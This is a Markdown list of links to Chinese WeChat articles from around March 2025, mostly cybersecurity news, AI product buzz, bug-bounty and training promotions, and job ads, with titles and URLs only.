* [一文速览|2025《政府工作报告》中的数字化发展和网络安全建设](https://mp.weixin.qq.com/s?__biz=MzIxNDIzNTcxMg==&mid=2247507097&idx=1&sn=2ca486651b542bc9612ef9c4bdd8bcd7)
|
|||
|
|
* [又一款中国现象级AI产品刷屏!Manus什么来头?](https://mp.weixin.qq.com/s?__biz=MzkwMTMyMDQ3Mw==&mid=2247598057&idx=2&sn=9e0e6b050bdbe65f7a961259c556ec08)
|
|||
|
|
* [震惊!黑客界“GTA”《看门狗:军团》源代码惨遭泄露,育碧这次糗大了!](https://mp.weixin.qq.com/s?__biz=MzU3MjczNzA1Ng==&mid=2247496536&idx=2&sn=0bc80dae746e8d03d9f2b54cdc5e1256)
|
|||
|
|
* [美国众议院通过法案:强制政府供应商设立漏洞披露计划](https://mp.weixin.qq.com/s?__biz=MzI4NDY2MDMwMw==&mid=2247513903&idx=2&sn=d68ae359b40edf3e65dd1d1f91932450)
|
|||
|
|
* [传美国将全面对华禁售AI芯片](https://mp.weixin.qq.com/s?__biz=Mzg4MDU0NTQ4Mw==&mid=2247529539&idx=2&sn=13b6d61d8aad2460edbbdf461a011918)
|
|||
|
|
* [两会报道丨光明网:我们要做出有思想、有智能、有立场的大模型](https://mp.weixin.qq.com/s?__biz=MjM5MTA3Nzk4MQ==&mid=2650210308&idx=1&sn=4ffa149fec6e9e9e565fc3f8a347ea7d)
|
|||
|
|
* [两会报道丨哈尔滨日报:应用大模型应对新技术安全风险](https://mp.weixin.qq.com/s?__biz=MjM5MTA3Nzk4MQ==&mid=2650210308&idx=2&sn=0c9f6dedfb27393d0ed060e2afc2895b)
|
|||
|
|
* [2025网络安全招聘季:部分核心岗位年薪暴增40%!这些“黄金岗”再不抢就没了!](https://mp.weixin.qq.com/s?__biz=MzUzNjkxODE5MA==&mid=2247488857&idx=1&sn=7929140068ee19e9b737baaaf875e078)
|
|||
|
|
* [特朗普签署行政命令,建立战略比特币储备](https://mp.weixin.qq.com/s?__biz=MzUzODYyMDIzNw==&mid=2247517548&idx=1&sn=fef449b4c525f4845d2d465af2bfcadf)
|
|||
|
|
* [中情局敏感设施大楼待售,是间谍活动场所的转变还是情报界的神秘操作?](https://mp.weixin.qq.com/s?__biz=MzA3Mjc1MTkwOA==&mid=2650560189&idx=1&sn=fd1773f3532392e28810c1c85f081a81)
|
|||
|
|
* [每周网络安全简讯 2025年 第10周](https://mp.weixin.qq.com/s?__biz=MzU2MjcwOTY1Mg==&mid=2247521235&idx=1&sn=4c9676ce0fe954f9ef4a4498721d993c)
|
|||
|
|
* [安全动态丨网络空间安全动态第248期](https://mp.weixin.qq.com/s?__biz=MzU2MjcwOTY1Mg==&mid=2247521235&idx=2&sn=60e53f8ef492926fba1655d586c248b7)
|
|||
|
|
* [SFSRC | 2025.1月英雄榜单公布](https://mp.weixin.qq.com/s?__biz=MzU3OTAyODk4MQ==&mid=2247491234&idx=1&sn=951c7aee6ec9c84754eeea9f0ff01279)
|
|||
|
|
* [SFSRC | 2024.12月英雄榜单公布](https://mp.weixin.qq.com/s?__biz=MzU3OTAyODk4MQ==&mid=2247491234&idx=2&sn=69fc42595041c57d9fea81d4715dc023)
|
|||
|
|
* [两月赚百万的黑客和那些饭都要不到的黑客](https://mp.weixin.qq.com/s?__biz=Mzg4MzY3MTgyMw==&mid=2247484027&idx=1&sn=2a611f4314f9a27edcb54809ebb7e315)
|
|||
|
|
* [工信部信息通信科技委网络空间安全专家咨询组召开2024年度重大课题及面上课题结题评审会](https://mp.weixin.qq.com/s?__biz=Mzg5MzQ5NjQyNw==&mid=2247486214&idx=1&sn=d6cce9dd224baab8a662790b626b05b7)
|
|||
|
|
* [上海对12家网站平台开展网络平台算法典型问题专项检查](https://mp.weixin.qq.com/s?__biz=Mzg4NzQ4MzA4Ng==&mid=2247485437&idx=1&sn=fbade0cd5c0b2fe4014fbbb8bf51bccd)
|
|||
|
|
* [!!吃瓜!! 安全不做也罢~sqg已气死](https://mp.weixin.qq.com/s?__biz=Mzg3NzkwMTYyOQ==&mid=2247488702&idx=1&sn=5904ca751a67f3af1c4940cead478a5d)
|
|||
|
|
* [安全圈多地苹果手机用户称使用“免密支付”遭盗刷,客服:账户或被盗,及时申请拦截有望找回](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068317&idx=1&sn=eb54c7cf9dfc74424aae01869833a8b1)
|
|||
|
|
* [安全圈谷歌静默追踪安卓设备,用户未开启任何应用也无法避免](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068317&idx=2&sn=1c03dd97b25a8b7645deecf5c86c3849)
|
|||
|
|
* [我实验室项目获评国家工信部网络安全技术应用典型案例](https://mp.weixin.qq.com/s?__biz=MzU4NzUxOTI0OQ==&mid=2247493232&idx=1&sn=739cecaea3a845eaac689b309094882e)
|
|||
|
|
* [美国两名黑客利用漏洞窃取900余张演唱会门票,最高面临15年监禁](https://mp.weixin.qq.com/s?__biz=MzU2MTQwMzMxNA==&mid=2247541688&idx=1&sn=ecfa91663f8250f853be12a7b0839443)
|
|||
|
|
* [多家企业不履行网络安全保护义务被依法处罚](https://mp.weixin.qq.com/s?__biz=Mzg3MTU1MTIzMQ==&mid=2247496445&idx=2&sn=ecc9b2293a15a8b5c5097cc27ecb6580)
|
|||
|
|
* [国家计算机病毒应急处理中心通报15款违规App](https://mp.weixin.qq.com/s?__biz=MjM5MzMwMDU5NQ==&mid=2649171350&idx=2&sn=784f5a029f38ecd9d74b84bc4505eef2)
|
|||
|
|
* [赛迪热点“人工智能+”:硬核科技加速走进产业竞技场](https://mp.weixin.qq.com/s?__biz=MjM5NzYwNDU0Mg==&mid=2649250306&idx=1&sn=0e19405d86a72c00302b2ab60422cf86)
|
|||
|
|
* [16个国家级科技人才荣誉称号](https://mp.weixin.qq.com/s?__biz=Mzg4MDU0NTQ4Mw==&mid=2247529539&idx=1&sn=6137418288e53f8ea820d7e08c11abd3)
|
|||
|
|
|
|||
|
|
### 📌 其他
|
|||
|
|
|
|||
|
|
* [CTFstudy-all-in-one研发启动](https://mp.weixin.qq.com/s?__biz=MzI1NzUxOTUzMA==&mid=2247485876&idx=1&sn=01ccf5f1e3d313024dca0302ce9fe0d3)
|
|||
|
|
* [产教融合再突破!山石网科30项入选教育部产学合作项目](https://mp.weixin.qq.com/s?__biz=MzAxMDE4MTAzMQ==&mid=2661299053&idx=1&sn=5a1775091b778f90a79ccb7ad004ad24)
|
|||
|
|
* [Manus AI 爆火之后:AI Agent 的下一个风口在哪里?](https://mp.weixin.qq.com/s?__biz=Mzg5MDQyMzg3NQ==&mid=2247484585&idx=1&sn=d9b69aa694cfe16c42affd6cc6c2c4fd)
|
|||
|
|
* [智能体发布:AI公文优化专家](https://mp.weixin.qq.com/s?__biz=MzI1NDMxOTkyNw==&mid=2247485596&idx=1&sn=dfc4943ec78d1bce4503fc3aad093e0b)
|
|||
|
|
* [没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧](https://mp.weixin.qq.com/s?__biz=Mzg3OTUxNTU2NQ==&mid=2247490069&idx=1&sn=54bdd102ec70230d9f035b108f17b539)
|
|||
|
|
* [不吹不黑,拿到邀请码一手实测Manus,还有人0天就复刻出了开源版](https://mp.weixin.qq.com/s?__biz=Mzg3OTUxNTU2NQ==&mid=2247490069&idx=2&sn=0823e236484ffa8da52184b070c7d666)
|
|||
|
|
* [爆火1.5k星!OpenManus 3小时闪电战打破5万元邀请码垄断,AI代理技术平民化革命](https://mp.weixin.qq.com/s?__biz=Mzg3OTUxNTU2NQ==&mid=2247490069&idx=3&sn=e7f20ce70527aed8ed5552fb53594a90)
|
|||
|
|
* [当“考证热”遇上AI时代:舞弊更隐蔽,诚信更珍贵](https://mp.weixin.qq.com/s?__biz=MzU0MDkxNjEwNg==&mid=2247494351&idx=1&sn=3b8062baca99c4132f06ba19d979f14a)
|
|||
|
|
* [不到一天,Manus的免费平替来了](https://mp.weixin.qq.com/s?__biz=Mzg5NzA5MzIxMA==&mid=2247484637&idx=1&sn=2d6e9fc6cc5583160ddf610c42c0fcdc)
|
|||
|
|
* [你知道的等保测评服务机构有哪些](https://mp.weixin.qq.com/s?__biz=MzI5MTIwOTQ5MA==&mid=2247487751&idx=1&sn=95dc4e233a620bc239e75c50cb203927)
|
|||
|
|
* [今日下午开播!职称评审宣讲会](https://mp.weixin.qq.com/s?__biz=MzU0Mzk0NDQyOA==&mid=2247521617&idx=1&sn=4211ecca1d8b0bb9e3407cbd5ef51b20)
|
|||
|
|
* [网络安全进基层系列教育活动——水务集团](https://mp.weixin.qq.com/s?__biz=MzU0Mzk0NDQyOA==&mid=2247521617&idx=2&sn=3d2e4b8b79d1fac4cfa359a8094821cb)
|
|||
|
|
* [猫耳大型活动提效——组件低代码化](https://mp.weixin.qq.com/s?__biz=Mzg3Njc0NTgwMg==&mid=2247502574&idx=1&sn=cfe09476d324b7a648ced0b8060562dc)
|
|||
|
|
* [被导师遗忘的研究生如何用AI自救?无人指导下论文写作全攻略!](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=1&sn=27e088b1ca23409efb02e3e03195b317)
|
|||
|
|
* [读完秒懂:用AI深度剖析论文写作拖延症心理根源的实战指南!](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=2&sn=7cccbb8d2632c9bb23da70d3f1548ea6)
|
|||
|
|
* [突破熬夜写论文瓶颈:用AI解决深夜写论文的全流程高效技巧指南。](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=3&sn=fdb1c725ae4dd0dadd4f1cb330adf51c)
|
|||
|
|
* [团队论文写作中的AI协作攻略:消除意见分歧的7大实用技巧。](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=4&sn=676cce2bd4b77ea3b733bd0e42b1c963)
|
|||
|
|
* [小白快速掌握AI高效解决学术论文图表制作内部攻略,审稿人一见钟情的秘密武器!](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=5&sn=313ae1c5b4aee647f813130bc9d18ed7)
|
|||
|
|
* [学术救生艇:如何用AI神奇修复实验失败与数据丢失的内部专业指南。](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=6&sn=f975c39939b475b9206f8f83737c2ee5)
|
|||
|
|
* [一周高效消化100+相关文献的AI内部攻略,文献狂魔都在用!](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=7&sn=7ac5148c5b2267109b59b578c71341d1)
|
|||
|
|
* [AI辅助论文写作全攻略:无导师也能高效完成高质量学术论文的秘密武器!](https://mp.weixin.qq.com/s?__biz=MzU4MzM4MzQ1MQ==&mid=2247493378&idx=8&sn=2150da10a96fe6784658df009619fd08)
|
|||
|
|
* [重磅推荐 | 个人信息保护合规审计师 CCRC-PIPCA](https://mp.weixin.qq.com/s?__biz=MzU4MjUxNjQ1Ng==&mid=2247522220&idx=2&sn=43f6c16d36be0ec832896547301d4a19)
|
|||
|
|
* [蛇矛实验室网境试验场首测!](https://mp.weixin.qq.com/s?__biz=MzkwMjI1NzY4Ng==&mid=2247525223&idx=1&sn=acab2f3bb064ea39b2c5650c9248d0ef)
|
|||
|
|
* [每周蓝军技术推送(2025.3.1-3.7)](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247494096&idx=1&sn=430a021ea771312b87cc1617ff004c5e)
|
|||
|
|
* [破晓之光·她力量 | 中国电信安全公司巾帼图鉴](https://mp.weixin.qq.com/s?__biz=MzkxNDY0MjMxNQ==&mid=2247533625&idx=1&sn=ad0b5c62b4fb63ca9b85cb4cc94d1c21)
|
|||
|
|
* [2025漏洞挑战专项第一期白帽子集结令!火力全开](https://mp.weixin.qq.com/s?__biz=MzI5NTQwMjYxNg==&mid=2247483820&idx=1&sn=07b5fe3cfe82159677399af8922f088c)
|
|||
|
|
* [Web3 | 国枫团队与BlockSec达成Web3合规产品生态战略合作](https://mp.weixin.qq.com/s?__biz=MzkyMzI2NzIyMw==&mid=2247488678&idx=1&sn=0bb668d81d2a9dfd012256c539e342ff)
|
|||
|
|
* [专题·漏洞人才培养 | 知攻善防,内外兼修,网络安全实战人才培养的实践之道](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664237950&idx=1&sn=564e1295e727202d88f8e34675c0d416)
|
|||
|
|
* [在腾讯工作的程序媛都是什么样](https://mp.weixin.qq.com/s?__biz=MjM5ODYwMjI2MA==&mid=2649791896&idx=1&sn=5eb62b54af2689716363c86951fb8632)
|
|||
|
|
* [长沙安全运维招聘(工作极其稳定)+代码审计课程广告(明广)](https://mp.weixin.qq.com/s?__biz=Mzg5OTg1MDk0Mw==&mid=2247485528&idx=1&sn=49935d25cc4a80725651f1d008c3a232)
|
|||
|
|
* [天融信助力某基金管理公司用AI重塑安全运营](https://mp.weixin.qq.com/s?__biz=MzA3OTMxNTcxNA==&mid=2650965762&idx=1&sn=22a50c46cc705e106f9e2d90cad758f0)
|
|||
|
|
* [双擎驱动:构建“开放·共生”的数字化安全生态](https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651388937&idx=1&sn=3a858d956529a4ca4a251e64fd64ea9d)
|
|||
|
|
* [实战SRC记一次共享电瓶车测试记录](https://mp.weixin.qq.com/s?__biz=MzkyOTI4NTY4MQ==&mid=2247491220&idx=1&sn=65763e81faf89c1b2bb24e71dfb7d9ac)
|
|||
|
|
* [仅用15天拿证!阿里云ACP快速通关指南](https://mp.weixin.qq.com/s?__biz=MzkxMzMyNzMyMA==&mid=2247571554&idx=2&sn=99b6793cd994aad03581ff6d4243b63f)
|
|||
|
|
* [网络安全国企岗位招聘专科起招](https://mp.weixin.qq.com/s?__biz=MzkxNzIzNDExMA==&mid=2247486701&idx=1&sn=b780c82ef141b43c6da057dcc6abbc48)
|
|||
|
|
* [没有了美国援助,乌克兰能继续战争吗?](https://mp.weixin.qq.com/s?__biz=Mzg2NTYyODgyNg==&mid=2247504979&idx=1&sn=5967b791da20afefb613044e5ecfd0a7)
|
|||
|
|
* [那些网安牛马老了都干啥去了?](https://mp.weixin.qq.com/s?__biz=MzkxNzY5MTg1Ng==&mid=2247486056&idx=1&sn=74e53fa70f6be6ab3989a33a18c2ce4f)
|
|||
|
|
* [AI赋能网站分析全新上线!取证云平台V2即将重磅来袭](https://mp.weixin.qq.com/s?__biz=MjM5NTU4NjgzMg==&mid=2651439036&idx=2&sn=63c672021e48be864bea02e21a618058)
|
|||
|
|
* [盘点你学过的过时计算机技术](https://mp.weixin.qq.com/s?__biz=MzU3MjczNzA1Ng==&mid=2247496536&idx=1&sn=2dab21eec5a7730559e61cc5034b0d90)
|
|||
|
|
* [你画我猜](https://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247491280&idx=1&sn=9459e0b4dd862b9e8fc469cb7ce3f204)
|
|||
|
|
* [Monica邀请码含官方不限次数邀请码](https://mp.weixin.qq.com/s?__biz=MzUxNDg3ODY2MQ==&mid=2247485363&idx=1&sn=677317746e54d0c07af556264860b67e)
|
|||
|
|
* [活动LPSRC 翻倍活动开启!!!](https://mp.weixin.qq.com/s?__biz=Mzg5MjY0MTEzMQ==&mid=2247483856&idx=1&sn=5c2c859109be1e285e44fa68fa597432)
|
|||
|
|
* [诚邀渠道合作伙伴共启新征程](https://mp.weixin.qq.com/s?__biz=MzI3NjYzMDM1Mg==&mid=2247524533&idx=2&sn=b47313d0544c0c85ec4b25f06c20c438)
|
|||
|
|
* [牛品推荐 | 一站式守护大模型安全的恒脑智盾](https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651135404&idx=2&sn=1781f1f569c1ea4ae646f03378e75ccb)
|
|||
|
|
* [网传manus邀请码爆破成功?](https://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247491276&idx=1&sn=a8132c1aba3f8a9c61f321507fee6448)
|
|||
|
|
* [新赛季!ATEC2025•人工智能机器人创新应用&安全](https://mp.weixin.qq.com/s?__biz=MzA3MTAwODc0NQ==&mid=2649891307&idx=1&sn=2f59a8912eab5db7aa63d4d4530fc0bd)
|
|||
|
|
* [资源分享运维服务、开发、管理、解决方案](https://mp.weixin.qq.com/s?__biz=Mzg4OTI0MDk5MQ==&mid=2247493490&idx=1&sn=6e64e7d8600ec290059834670bb5c06e)
|
|||
|
|
* [掌控安全特邀嘉宾课 | 教育专项 | 行业HW](https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247548572&idx=1&sn=f6571336f89fb42b63807f37885a5f5a)
|
|||
|
|
* [某超融合设备 && 某堡垒机](https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247548572&idx=2&sn=2f502e727271188d1dad228bc2013973)
|
|||
|
|
* [业务范围汇总及奖励机制汇总](https://mp.weixin.qq.com/s?__biz=MzI2OTYzOTQzNw==&mid=2247488776&idx=1&sn=3a191abe117f7fe697eb1cbce07972a6)
|
|||
|
|
* [神州希望协助昌江县科工信局开展网络安全意识培训](https://mp.weixin.qq.com/s?__biz=MzA4Mzg1ODMwMg==&mid=2650725107&idx=1&sn=45027a74584b35a6d628d69f409bab6f)
|
|||
|
|
* [国外警务前沿科技汇编](https://mp.weixin.qq.com/s?__biz=MzkwMTQyODI4Ng==&mid=2247496048&idx=1&sn=2f0eb20c9ba5e729f7a927c89aa3a976)
|
|||
|
|
* [网络安全培训课程升级,美刀赏金等你来拿!](https://mp.weixin.qq.com/s?__biz=MzkyNzQzODA3Ng==&mid=2247484811&idx=1&sn=ef60e3ea1a19e250b35ca8fbc1e6594f)
|
|||
|
|
* [挖洞姿势千万种,合规测试要牢记!](https://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=2727844251&idx=1&sn=6b2b657e9fa2ff85516477e470ae8d11)
|
|||
|
|
* [上新 | 打工必备办公插件 OfficePLUS 上架,iSlide Mac 版大更新!](https://mp.weixin.qq.com/s?__biz=MzI2MjcwMTgwOQ==&mid=2247492250&idx=1&sn=68709ae5e36db677caa6bee7e2a539e6)
|
|||
|
|
* [一些关于 Manus 的独家信息和慢思考](https://mp.weixin.qq.com/s?__biz=MzkyMDY4MTc2Ng==&mid=2247484039&idx=1&sn=63c967eb0c3086f3b4af005e876ed844)
|
|||
|
|
* [原创-3.7.10新算命算法,上线神算网shensuan.2k8.org](https://mp.weixin.qq.com/s?__biz=Mzg4NzAwNzA4NA==&mid=2247485130&idx=1&sn=1ba2e5c27f9418b1598e0103c69090f7)
|
|||
|
|
* [《论语别裁》第01章 学而(20)饮食男女](https://mp.weixin.qq.com/s?__biz=Mzg5NTU2NjA1Mw==&mid=2247500885&idx=1&sn=6a297acfdbe61c1b46dac684c03c7e55)
|
|||
|
|
* [HW开始前会做哪些措施:AI在攻防中扮演了怎样的角色 | FB甲方群话题讨论](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651315731&idx=2&sn=a933af4bca7b1f15f1a1a3c81ed099b6)
|
|||
|
|
* [没有脱裤都是低危,脱裤就报警](https://mp.weixin.qq.com/s?__biz=MzkxNTczMjA1Ng==&mid=2247484049&idx=1&sn=d03cec2e6f04b99766fc9c6d328a02cd)
|
|||
|
|
* [夫子ASPM重磅升级︱体系化治理软件供应链安全的痛点难题,All in one!](https://mp.weixin.qq.com/s?__biz=MzA3NzE2ODk1Mg==&mid=2647796032&idx=1&sn=d68f86516e0672f68020270d7fc83b19)
|
|||
|
|
* [2025 HW招聘时刻、结款稳定,项目稳定!](https://mp.weixin.qq.com/s?__biz=MzkwMjIzNTU2Mg==&mid=2247484247&idx=1&sn=ec3a43028a100fe463d8b2bdb0fa2177)
|
|||
|
|
* [Phrack杂志四十年(二)](https://mp.weixin.qq.com/s?__biz=MzAxNzYyNzMyNg==&mid=2664232624&idx=1&sn=1fa539f2fb745709f881acc852423d15)
|
|||
|
|
* [Operation Sundevil和EFF的诞生](https://mp.weixin.qq.com/s?__biz=MzAxNzYyNzMyNg==&mid=2664232624&idx=2&sn=826724e518dcb162c08ace40e0a73bc3)
|
|||
|
|
* [Aleph One和他的名篇《Smashing The Stack For Fun And Profit》](https://mp.weixin.qq.com/s?__biz=MzAxNzYyNzMyNg==&mid=2664232624&idx=3&sn=0453377e59b0f9767e918441b044fea1)
|
|||
|
|
* [Mudge小传和Phrack Prophile](https://mp.weixin.qq.com/s?__biz=MzAxNzYyNzMyNg==&mid=2664232624&idx=4&sn=e80d4893f5435d75c50d843f4513e1fc)
|
|||
|
|
* [G.O.S.S.I.P 阅读推荐 2025-03-07 基于互信息引导的预训练编码器后门攻击缓解方法](https://mp.weixin.qq.com/s?__biz=Mzg5ODUxMzg0Ng==&mid=2247499879&idx=1&sn=6ff11498bdc390722a2bd454c82947e8)
|
|||
|
|
* [AI巨浪中的安全之舵:天空卫士助力人工智能落地远航](https://mp.weixin.qq.com/s?__biz=MzA5MjQyODY1Mw==&mid=2648518834&idx=1&sn=27edb673cb1f5b75097b62c30ae19f2b)
|
|||
|
|
* [开箱即用!渊亭发布DeepSeek一体机,专属AI生产力一键激活](https://mp.weixin.qq.com/s?__biz=MzIzNjE1ODE2OA==&mid=2660190763&idx=1&sn=0e9c0bfb9f9a7f0e5a369b8a198452a4)
|
|||
|
|
* [sql注入src厂商给低微?](https://mp.weixin.qq.com/s?__biz=MzU3Mjk2NDU2Nw==&mid=2247492816&idx=1&sn=420723773a934cc4ec58e3dab0726499)
|
|||
|
|
* [国投智能 x DeepSeeK ! 2025年第一季度新品即将“满血”上线](https://mp.weixin.qq.com/s?__biz=MjM5NTU4NjgzMg==&mid=2651439036&idx=1&sn=f96ceaf31677c709133d2f7e58d70890)
|
|||
|
|
* [是兄弟,点进来!HVV招募!](https://mp.weixin.qq.com/s?__biz=Mzg3NzIxMDYxMw==&mid=2247504392&idx=1&sn=86aada306847c5c3876fe0677269e16d)
|
|||
|
|
* [妇女节特辑 | 解密信安女性的职业密码](https://mp.weixin.qq.com/s?__biz=MjM5NzgzMjMwNw==&mid=2650663647&idx=1&sn=82a8b2bf806449d9610bc4e1f5af8618)
|
|||
|
|
* [“Why now?”决定安全初创生死的灵魂拷问](https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247637181&idx=1&sn=7f52159176888d3f4ab5eba32cafaaea)
|
|||
|
|
* [诸子云|甲方 :企业安全预算有哪些变动?如何看待安全BP?](https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247637181&idx=3&sn=fc4c43bcccec3e5a14611dc1d35ee25c)
|
|||
|
|
* [两会聚焦|对话齐向东:守护AI产业自下而上的创新张力](https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247625549&idx=1&sn=7e8ab48b9a6d791943449506e291adca)
|
|||
|
|
* [三大赛事开启北京网络安全大会(BCS2025)——引领AI安全新变革 重塑数字攻防新范式](https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247625549&idx=2&sn=411f729ee20c447362445cb42bfd2b2f)
|
|||
|
|
* [国源天顺集团举行情暖三八节 巾帼展风采活动](https://mp.weixin.qq.com/s?__biz=Mzg3MTU1MTIzMQ==&mid=2247496445&idx=1&sn=f30fd441f6ffcbaf00fac97b9631425a)
|
|||
|
|
* [一次性看个够,攻防厚码锦集!](https://mp.weixin.qq.com/s?__biz=MzkwMTU2NzMwOQ==&mid=2247484642&idx=1&sn=32613f32dcbe58c8f019e0bb8e8bad1a)
|
|||
|
|
* [展商风采 | Commvault为汽车数据安全保驾护航,亮相谈思AutoSec 9周年年会](https://mp.weixin.qq.com/s?__biz=MzIzOTc2OTAxMg==&mid=2247551716&idx=2&sn=a9a27c94474321745df4a9146bce1617)
|
|||
|
|
* [3.8特辑:不负春光,共绽女性芳华](https://mp.weixin.qq.com/s?__biz=MzAwNTAxMjUwNw==&mid=2650277794&idx=1&sn=7dab760ce8ff4ff8b35cd58ce4be65c3)
|
|||
|
|
* [三月七日,阳光正好,我们共赴一场春日之约!](https://mp.weixin.qq.com/s?__biz=MzI4MDE2MzA4Mw==&mid=2667651106&idx=1&sn=c01f235a796a8799ac6741fb51c6fae6)
|
|||
|
|
* [两会专访丨全国政协委员、中国信通院院长余晓晖:人工智能将在更多实体经济领域实现深度应用](https://mp.weixin.qq.com/s?__biz=MzU1OTUxNTI1NA==&mid=2247592711&idx=1&sn=f8fb7c896687eebe1f1415f00381fb07)
|
|||
|
|
* [产品爆款蕉绿注释](https://mp.weixin.qq.com/s?__biz=MzU5NzQ3NzIwMA==&mid=2247486469&idx=1&sn=0ff5b8a7d44655da20976900998bbebe)
|
|||
|
|
* [内推 | 绿盟烈鹰战队安全研究岗火热招聘中](https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247497183&idx=1&sn=06dd8e2c679c583749ecc134571edfaa)
|
|||
|
|
* [军事行动中的认知战:如何提高叙事说服力?](https://mp.weixin.qq.com/s?__biz=Mzg3MDczNjcyNA==&mid=2247489035&idx=1&sn=9ae0e136638f0a256333329f023646c7)
|
|||
|
|
* [3月15日开启!先知安全沙龙-深圳站](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458590590&idx=2&sn=37a0de2f10ec6c3d425102452f283b26)
|
|||
|
|
* [近期招聘合集汇总](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458590590&idx=4&sn=bfb9c0e6a3c5f02b32e55b710a53d569)
|
|||
|
|
* [广东华兴银行招大数据部负责人,涉数据规划、数据治理、数据系统建设等工作](https://mp.weixin.qq.com/s?__biz=MzIxMDIwODM2MA==&mid=2653931658&idx=3&sn=020c3c48909f87595c302e9e3a355cbd)
|
|||
|
|
* [1CPEISC2 Webinar丨基于研究报告,为2025年筑牢防护屏障](https://mp.weixin.qq.com/s?__biz=MzUzNTg4NDAyMg==&mid=2247492473&idx=1&sn=e91c50136d6889c4467f5e03cd8003ef)
|
|||
|
|
* [超高性价比,299元从0逆袭SRC核心白帽!](https://mp.weixin.qq.com/s?__biz=Mzk0OTY1NTI5Mw==&mid=2247491324&idx=1&sn=1d73fa1e35a6721dcfcd1c4886eaea96)
|
|||
|
|
* [免费领全网最详尽的HW护网行动全套培训资料](https://mp.weixin.qq.com/s?__biz=MzkxNTIwNTkyNg==&mid=2247554107&idx=2&sn=550eab7b3d2cf4b6f6ad4e3964b22fe2)
|
|||
|
|
* [鼎信安全 | 3.8节定格春日美好,绽放永恒芳华](https://mp.weixin.qq.com/s?__biz=MzIwOTc4MTE4Nw==&mid=2247501492&idx=1&sn=2c98150feb9d762a1105d8852f706eaa)
|
|||
|
|
* [春风十里,芳华如你!湖南金盾组织妇女节“多肉微景观DIY派对”活动](https://mp.weixin.qq.com/s?__biz=MzIyNTI0ODcwMw==&mid=2662129285&idx=1&sn=91d1aebccf5724b331cd5c721df424e8)
|
|||
|
|
* [飞天诚信亮相日本零售科技展RetailTech Japan 2025](https://mp.weixin.qq.com/s?__biz=MjM5NDE1MjU2Mg==&mid=2649876790&idx=1&sn=37ecbde06ea34e886fb140cb48528f95)
|
|||
|
|
* [资本家看了都流泪,犹太人看了都下跪](https://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247491284&idx=1&sn=a7294bfd94c604ac4cbf90060fa7d20f)
|
|||
|
|
* [海云安十周年生日快乐|十年峥嵘 奋进未来](https://mp.weixin.qq.com/s?__biz=MzI2MjY2NTM0MA==&mid=2247492340&idx=1&sn=f131ad6a9f8ac1112df4c3409c8fa1c2)
|
|||
|
|
* [妇女节快乐| 来看看她们和 MarsCode 编程助手的故事(文末有福利)](https://mp.weixin.qq.com/s?__biz=MzI1MzYzMjE0MQ==&mid=2247513696&idx=1&sn=b97a7c1ca28e948ac6ea6978a3c08c8b)
|
|||
|
|
* [更适用于信息安全行业的AI模型](https://mp.weixin.qq.com/s?__biz=Mzk0NTg3ODYxNg==&mid=2247485339&idx=1&sn=768f5fc352c5c0d4574b77da158892d4)
|
|||
|
|
* [国际人工智能安全报告:先进人工智能安全国际科学报告](https://mp.weixin.qq.com/s?__biz=MzI1OTExNDY1NQ==&mid=2651619651&idx=1&sn=c8649ced94c9b46c1a595299df3f831f)
|
|||
|
|
* [美国推迟对加拿大、墨西哥征收关税](https://mp.weixin.qq.com/s?__biz=MzI1OTExNDY1NQ==&mid=2651619651&idx=2&sn=7335b23cd8cabe50169d2e8a97e92b4f)
|
|||
|
|
* [二. 想赚钱必须搞明白--BTC多空力量](https://mp.weixin.qq.com/s?__biz=MzI3NTcwNTQ2Mg==&mid=2247487717&idx=1&sn=915b82b1ba77c2b8491130ca51da83e0)
|
|||
|
|
* [大模型安全新范式:网易易盾发布DeepSeek一体机内容安全卫士](https://mp.weixin.qq.com/s?__biz=MzAwNTg2NjYxOA==&mid=2650743152&idx=1&sn=55892ab86d52f82054cb2e0ff3ca93fe)
|
|||
|
|
* [关于第十八届全国大学生信息安全竞赛(创新实践能力赛)暨第二届“长城杯”铁人三项赛(防护赛)半决赛奖项、奖金和晋级规则的说明](https://mp.weixin.qq.com/s?__biz=MzAxNTc1ODU5OA==&mid=2665516334&idx=1&sn=0124d4455fd2d2ce878672ec0b9bfa3e)
|
|||
|
|
* [两会声音|AI安全与治理大热,网络安全、数据安全等引关注](https://mp.weixin.qq.com/s?__biz=MjM5MzMwMDU5NQ==&mid=2649171350&idx=1&sn=5e2aca6de77359d8b88032df21ad73d2)
|
|||
|
|
